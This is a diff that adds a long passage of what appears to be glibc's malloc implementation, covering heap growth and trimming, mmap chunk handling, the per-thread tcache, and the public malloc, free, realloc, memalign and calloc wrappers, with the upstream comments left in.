+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
